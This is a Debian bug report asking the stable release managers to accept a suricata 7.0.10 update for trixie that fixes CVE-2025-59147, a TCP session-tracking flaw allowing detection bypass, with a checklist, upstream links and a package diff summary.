Bug#1119940: trixie-pu: package suricata/1:7.0.10-1

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#1119940: trixie-pu: package suricata/1:7.0.10-1
From: Andreas Dolp <dev@andreas-dolp.de>
Date: Sun, 02 Nov 2025 16:51:55 +0100
Message-id: <[🔎] 176209871569.7.6177953677260339996.reportbug@4daab4fcc97d>
Reply-to: Andreas Dolp <dev@andreas-dolp.de>, 1119940@bugs.debian.org

Package: release.debian.org
Severity: normal
Tags: trixie
X-Debbugs-Cc: suricata@packages.debian.org, satta@debian.org, dev@andreas-dolp.de
Control: affects -1 + src:suricata
User: release.debian.org@packages.debian.org
Usertags: pu

Dear stable release managers,

I'd like to hand in another security patch for suricata 7.0.10
in Debian trixie. In accordance with the security team, the
CVE will not warrant a DSA and should be included in the next
point release.

We'd like to release this patch together with #1116945 as
suricata 1:7.0.10-1+deb13u1 for suite 'trixie' in 13.2.

[ Reason ]
Security fix for CVE-2025-59147 [1]
Upstream ticket: [2]

[ Impact ]
Crafted traffic sending multiple SYN packets with different
sequence numbers within the same flow tuple can cause Suricata
to not pickup the TCP session.
In IDS mode this can lead to a detection and logging bypass.
In IPS mode this will lead to the flow getting blocked. [4]

[ Tests ]
In the original upstream ticket [3] there are pcaps and rules
attached. Testing against the vulnerable and the fixed version
seems to fix the vulnerability as expected. Unit-tests in
autopkgtest run successfully for the patched version.

[ Risks ]
Program crashes if fix would contain errors, but not patching
the vulnerabilities can lead to bypassing detection and that
would miss the point of an IDS/IPS.

[ Checklist ]
  [x] *all* changes are documented in the d/changelog
  [x] I reviewed all changes and I approve them
  [x] attach debdiff against the package in (old)stable
  [x] the issue is verified as fixed in unstable

[ Changes ]
Applied patch containing upstream commit e91b03c9, but slightly
modified to fit for Suricata 7.0.10. [5]

[ Other info ]
[1] https://security-tracker.debian.org/tracker/CVE-2025-59147
[2] https://redmine.openinfosecfoundation.org/issues/7852
[3] https://redmine.openinfosecfoundation.org/issues/7657
[4] https://github.com/OISF/suricata/security/advisories/GHSA-v8hv-6v7x-4c2r
[5] https://github.com/OISF/suricata/commit/e91b03c9.patch

Attachment: 0001-Fix-CVE-2025-59147-in-7.0.10-for-trixie.patch
Description: application/mbox

File lists identical (after any substitutions)

Control files: lines which differ (wdiff format)
------------------------------------------------
Installed-Size: [-8989-] {+8925+}
Version: [-1:7.0.10-1-] {+1:7.0.10-1+deb13u1+}

Reply to:

Follow-Ups:
- Processed: trixie-pu: package suricata/1:7.0.10-1
  - From: "Debian Bug Tracking System" <owner@bugs.debian.org>
- Bug#1119940: trixie-pu: package suricata/1:7.0.10-1
  - From: "Adam D. Barratt" <adam@adam-barratt.org.uk>
- Processed: Re: Bug#1119940: trixie-pu: package suricata/1:7.0.10-1
  - From: "Debian Bug Tracking System" <owner@bugs.debian.org>
- Bug#1119940: marked as done (trixie-pu: package suricata/1:7.0.10-1)
  - From: "Debian Bug Tracking System" <owner@bugs.debian.org>

Prev by Date: Processed: trixie-pu: package suricata/1:7.0.10-1
Next by Date: Bug#1119940: trixie-pu: package suricata/1:7.0.10-1
Previous by thread: Bug#1116394: transition: gnome-shell & gjs 49
Next by thread: Processed: trixie-pu: package suricata/1:7.0.10-1
Index(es):
- Date
- Thread